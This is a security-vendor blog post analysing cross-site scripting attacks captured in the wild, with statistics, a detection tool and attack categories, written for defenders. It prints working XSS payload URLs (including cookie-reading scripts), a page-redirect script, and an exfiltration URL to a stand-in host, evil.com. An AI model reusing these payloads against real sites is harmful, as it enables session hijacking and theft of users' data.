Trustwave SpiderLabs Uncovers Ov3r_Stealer Malware Spread via Phishing and Facebook Advertising. Learn More

Trustwave SpiderLabs Uncovers Ov3r_Stealer Malware Spread via Phishing and Facebook Advertising. Learn More

Services
Capture
Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

twi-managed-portal-color
Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

twi-briefcase-color-svg
Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

tw-laptop-data
Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

twi-database-color-svg
Database Security

Prevent unauthorized access and exceed compliance requirements.

twi-email-color-svg
Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

tw-officer
Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

tw-network
Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

Solutions
BY TOPIC
Microsoft Exchange Server Attacks
Stay protected against emerging threats
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Security Operations Platform
Trustwave Security Colony
Partners
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats
SpiderLabs Blog

The Web IS Vulnerable: XSS on the Battlefront (Part 1)

<SCRIPT> var str1 = "http://"; var str2 = "www.modsecurity.org"; var str3 = "/beacon.html"; var result = str1 + str2 + str3; window.location=result</SCRIPT>

For those of you who were not able to make it to our talk at Blackhat USA, this blog post provides an overview of the information presented. & This was a joint presentation by Trustwave SpiderLabs Research Team and Microsoft's Security Research and Defense Team.

10215_7e1187b7-8595-468e-9c2d-45ce257e3800

This is part 1 of a 2 part blog post. & In this installment, we will discuss example XSS attacks captured in the wild and also some statistics. & In part 2, we will discuss XSS Defense Techniques.

XSS: Vulnerability Prevalence

OWASP Top 10 2013

The latest OWASP Top 10 Web Applications Risk Project lists the following risk graphic for XSS:

12232_e0f7c112-6958-45f0-a331-1aa737074aec

As you can see from this graphic, the PREVALENCE of XSS across all applications tested is VERY WIDESPREAD.

Trustwave Global Security Report

In the latest Trustwave Global Security Report, the SpiderLabs App-Pentest Team generated the following list of top vulnerabiities identified in the last year during their engagements:

8570_2faff55c-a9bd-4fd6-a89f-383a72ec01c8Again, XSS is listed as the top vulnerability identified.

XSS: Attack Liklihood

The previous section provided metrics to support the theory that we already know - XSS vulnerabilities are rampant. & What we wanted to focus on for our research was this - HOW are XSS vulnerabilities being exploited in the wild? &

XSS Attack Data Sources

In order to find real-world attack data, we analyzed a variety of resources:

  • Webserver/proxy logs
  • Webapplication firewall logs
  • URLshortening services
  • Spame-mails
  • Chatrooms, IRC traffic
  • Commentson pages
  • URLreputation services

& All of this data together yielded approximately:

  • 100s TB of raw data
  • 10s TB of URLs

XSS Attack Data Analysis

So, how did we analyze this data for XSS attacks? & Greg created a toolset called detectXSSlib:

  • Generalpurpose library written in C
  • Basedon a subset of OWASP CRS rules (IE XSS Filters)
  • Optimizedfor performance
  • Rulesselected on the base of empirical data
  • Commandline tool provided (xssscan)
  • Easyto integrate with other components
  • nginxmodule PoCprovided

The xssscan comamnd line tool can be used like this:

# ./xssscan& xssscan ver 1.0 (c) 2013 Greg Wroblewski& Command line tool for detection of XSS attacks in URLs. Based on ModSecurity rules from OWASP CRS.Optimized for performance and large scale data mining.& Usage:xssscan [-t] [-r] [-x] <URL>xssscan [-a] [-d] [-r] [-x] -f <TEXT_FILE_WITH_URLS>& Options:& -a - in output replace host names with www.example.com& -d - deduplicate URLs by same host name& -r - show rule number for detected XSS (for statistics or debugging)& -t - show tokens of parsed URL (useful for debugging only)& -x - list only URLs where XSS was not detected (default: was detected)# ./xssscan -f /var/log/apache2/access.log172.16.209.1 - - [24/Jul/2013:10:40:40 -0400] "GET /wordpress/?s=%3Cscript%3Eprompt%28%22TEST%22%29%3B%3C%2Fscript%3EHTTP/1.1" 200 2155 "http://172.16.209.131/wordpress/?s=%3Cimg+src%3D1+onerror%3Dalert%28%27XSS%27%29%3E""Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0"

Sanitized Example Attack Data

Sanitized XSS attack data is found here in Greg's GitHub Repo. & Here is a small snippet of real-world attack data:

http://www.example.com/SpecialPages/SearchResults.aspx?searchtext=%3Cscript%3Ealert%28%22NO%20I%20WONT%20%3C3%20%22%29%3C/script%3E%3Chtml%3E%3Cbody%3E%3CIMG%20SRC=%22http://images.wikia.com/adventuretimewithfinnandjake/images/3/3e/Troll_Face.png%22%3E%3C/body%3E%3C/html%3E%3Ciframe%20width=%22560%22%20height=%22315%22%20src=%22http://www.youtube.com/watch?v=i6uK7VaREm0rel=0&amp;autoplay=1%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E%3Chtml%3E%3C%2fSCRIPT%3E&searchmode=anyword
http://www.example.com/cgi-bin/survey//%3Cvideo%3E%3Csource%20onerror=%22javascript:prompt%2869%29%22%3E
http://www.example.com/search/?q=%22%3E%3Cscript%3Ealert%28%27%D0%98+%D0%B2%D1%81%D1%91+%D1%82%D0%B0%D0%BA%D0%B8+%D1%80%D0%BE%D0%BC%D0%B0%D0%BD%D1%82%D0%B8%D0%BA%D0%B0+%D0%BF%D1%80%D0%B8%D1%81%D1%83%D1%82%D1%81%D0%B2%D1%83%D0%B5%D1%82%27%29%3C%2Fscript%3E&cx=011227069628851513317%3Aqmm3bt0nuum&cof=FORID%3A11&ie=UTF-8&siteurl=http%3A%2F%2Flaw.wfu.edu%2Fhousing%2F%3Fid%3D1090%2527
http://www.example.com/search.php?q=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E
http://www.example.com/search?q=%3Cscript%3Ealert%28%2Fsanko%2F%29%3C%2Fscript%3E&btnG=Go&site=mit&client=mit&proxystylesheet=http%3A%2F%2Fweb.mit.edu%2Fcre%2Fc%2Fgoogle-crestyles-v4.xsl&output=xml_no_dtd&as_dt=i&as_sitesearch=http%3A%2F%2Fweb.mit.edu%2Fcre&proxyreload=1
http://www.example.com/classkey.php?keyword=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3Ch1%3EKhawaja+Samad%3C%2Fh1%3
http://www.example.com/search?q=%22%3E%3Cscript%3Ealert%28%22hacked%20by%20blackwood%22%29%3B%3C%2Fscript%3E+%3E&btnG=Search&site=NYUWeb_Main&client=NYUWeb_Main&output=xml_no_dtd&proxyreload=1&proxystylesheet=stern_frontend&sitesearch=www.stern.nyu.edu&ie=UTF-8&sort=date%3AD%3AL%3Ad1&entqr=0&entqrm=0&entsp=a__NYUWeb_Main_bias_policy&oe=UTF-8&ud=1
http://www.example.com/catalog/details.php?search=%3Cscript%3Ealert%28%22pawa+gysb%22%29%3C%2Fscript%3E&submit.x=0&submit.y=0
http://www.example.com/microsite/itop_resultat.php?g1=Treball%20social&logo1=pt&url1=http://www.peretarres.org/wps/wcm/connect/peretarres_ca/eutses/home/estudis/graus_diplomatures/treball_social/treballador_social/&video1=%3Cscript%3Ealert%280%29%3C/script%3E&g2=&logo2=&url2=&video2=&g3=&logo3=&url3=&video3=&g4=&logo4=&url4=&video4=&g5=&logo5=&url5=&video5=&g6=&logo6=&url6=&video6=
http://www.example.com/fdsys/search/searchresults.action?st=%22%3E%3Cimg%20src=%22http://hubbu-hotel.square7.ch/x48HP.jpg%22%20height=%22650%22%20width=%221000%22%3E%3CIFRAME%20SRC=%22javascript:alert%28%27XSSED%20BY%20ANONYMOUS%20SQUAD%20035%27%29;%22%3E%3C/IFRAME%3E%3Cfont+color%3D%22red%22+size%3D%225%22%3EXSSD+BY%3A%3C%2Ffont%3E%3Cbr%3E%3Cfont+color%3D%22green%22+size%3D%2210%22%3E%3Cblink%3E+Anonymous+Squad+No.+035+%3C%2Fblink%3E%3C%2Ffont%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cfont+color%3D%22red%22%3EWe+are+Anonymous+%3Cbr%3E%3Cbr%3EWe+are+Legion+%3Cbr%3E%3Cbr%3EWe+do+not+FORGIVE%3Cbr%3E%3Cbr%3EWe+do+not+FORGET%3Cbr%3E%3Cbr%3EEXPECT+US!!!+%3Cbr%3E%3Cbr%3E%3C%2Ffont%3E%3Cfont+color%3D%22green%22+size%3D%225%22%3EGREETINGS+TO+%3A%3C%2Ffont%3E%3Cbr%3E%3Cmarquee+behavior%3D%22scroll%22+direction%3D%22left%22+scrollamount%3D%222%22+scrolldelay%3D%2220%22%3E%3Ch2%3E%20Anonymous%20Squad%20No.035%20was%20Here%20%3C/h2%3E%20%3Ch2%3E%20Hacked%20by%20xR0CKTH4T%20%3C/h2%3E%20%3Ch2%3E%20We%20are%20Anonymous%20%3Cbr%3E%20We%20are%20Legion%20%3Cbr%3E%20We%20do%20not%20forgive%20%3Cbr%3E%20We%20do%20not%20forget%20%3Cbr%3E%20Expect%20us!%20%3C/h2%3E

XSS Attack Examples: Proof-of-Concept Testing

Many XSS attacks are simple probes that test for the existence of missing output encoding defenses, for example:
9759_6ac997bc-4ee0-460d-81ce-fb93a4672089
These tests fall into the following categories:
Maliciousintent
  • Scanning tools
  • Proof-of-concept
  • Probing
Benignintent
  • Scanning tools
  • Going after bug bounty
  • Internal testing

XSS Attack Examples: Defacements

Website defacements were another popular outcome for using XSS attacks. & Here is an example attack payload:

8886_3fce5415-e73b-4746-b89a-a0f060360605This attack resulted in a defacement similar to the following screenshot:

12291_e3b70c27-c433-45d6-8655-2de8cbc2e594

XSS Attack Examples: Cookie Stealing

This is the first XSS attack category that directly negatively impacts web application users. & Here is an example attack payload:

11085_a812610f-aeec-4835-a50e-b7bfa2234c26In line #1 - the attacker sends the XSS payload in a parameter that overrides the Referer data echoed back in the response to execute JS code. & This code would instruct the browser to download the wwgw8k5srago.js file. & This file contains the data inline #2 which instructs the browser to make a request to the nwwgw8k5sra.gif URL and to pass the document.cookie DOM data as a parameter. & If this attack is successful, the attacker can quickly use the application Session ID cookie value to log into the application at the victim user.

XSS Attack Examples: In-Session Phishing

***This example uses an XSS vulnerability in Hotmail that has since been fixed.***

If attackers can identify XSS vulnerabilities within web-based email providers, then they can send targeted Phishing emails to users. & Take a look at the example exploit code:

12914_ffea4d86-0ff0-429b-9ac9-a7939a593b09In this instance, if I was logged into Hotmail and received the Phishing email, the JS code would trigger the onerror event call and issue a jQuery call to the attacker site which would present me with the following fake login page:

9037_47876866-79f8-403d-9dbb-ca3a0544ec16

If the victim fall for this attack, their credentials will be sent to the attacker's site. & We have seen at least 10 different instances of this type of attack, usually launched on e-mail providers and financial institutions, very often carefully prepared with localized login screens, well concealed password delivery servers, etc.

XSS Attack Examples: Data Exfiltration

With a successful attack, script runs in browser in current session of the victim. & The script could hijack and upload to attackers entire on-line content accessible from current session. & Examples: list of contacts, e-mails, attachments, calendar, files, etc... & After successful upload script re-directs to phishing page to get victim's credentials (address bar does not change!)

In one case of the attack, the script we have seen had 10s of kB of code, and even included interesting left-over comments. How nice.

8701_35cb0953-4a7a-4f3b-ba33-7c59e0f9e85f

The script was able to enumerate through multiple pages of e-mail boxes, extract e-mail data, including attachments, and also steal contact list. & Script was able to:

  • Enumerate through last 60 pages worth of e-mail
  • Extract the From, Subject, and Body of the e-mail by using the same calls as would be triggered if user were to view the e-mails
  • Inject new script elements with source set to the URL containing the next chunk of the data read from the file.
  • Send data in chunks to http://evil.com/hotmail_xss.php?u=<email>&msg= <subject+from>^^<segmentindex>^^<next segment of message body>
  • Fetch content off of inbox/sent/drafts.
  • Clean up : mark messages that were not originally read as unread

The upload process was also not trivial, leveraging data chunking.

7767_07da2e66-101c-4065-93a9-76e00a59c536XSS Attack Statistics

# of Successful XSS Attacks per TLD&

11683_c56cf290-afac-47af-b910-828e7ff5106e

We have seen at least one sample of working attack for almost every single TLD out there.

Successful XSS Attacks Over Time

8160_1a432bd0-a9a7-4fc6-b069-5e5b038e1dfd

The intensity of attacks remained on the constant level over the time we were able to monitor them consistently.

Prevalence of XSS Attacks& (based on Alexa Top N list)

11347_b4b66aef-8746-4a71-a395-e90a507f287e

Well over 6% of top 1,000 websites had a successful XSS attack.

Part 1 Conclusion

As we have outlined in Part 1 of this blog post, XSS attacks are real. They range in severity and impact depending on what your business model is and who your customers are however outcomes such as account hijacking and data exfiltration are serious issues.

How do we protect against XSS attacks? & Stay tuned for Part 2 where I will provide an overview of tactical XSS defenses which can be used in production to help mitigate exposures.

Latest SpiderLabs Blogs

Ukrainian Intelligence Claims Successful Compromise of the Russian Ministry of Defense

On March 4, 2024, the Telegram channel of the Main Directorate of Intelligence of the Ministry of Defense of Ukraine (GUR) was updated with assertions that they executed a successful cyberattack...

Read More

Cost Management Tips for Cyber Admins

As anyone who has filled out an expense report can tell you, cost management is everyone's responsibility. Organizations must apply a careful balance of budget planning and expenditures that are in...

Read More

Resurgence of BlackCat Ransomware

Updated March 8: Based on our experience, we believe that BlackCat's claim of shutting down due to law enforcement pressure is a hoax. We anticipate their return under a new guise or brand after...

Read More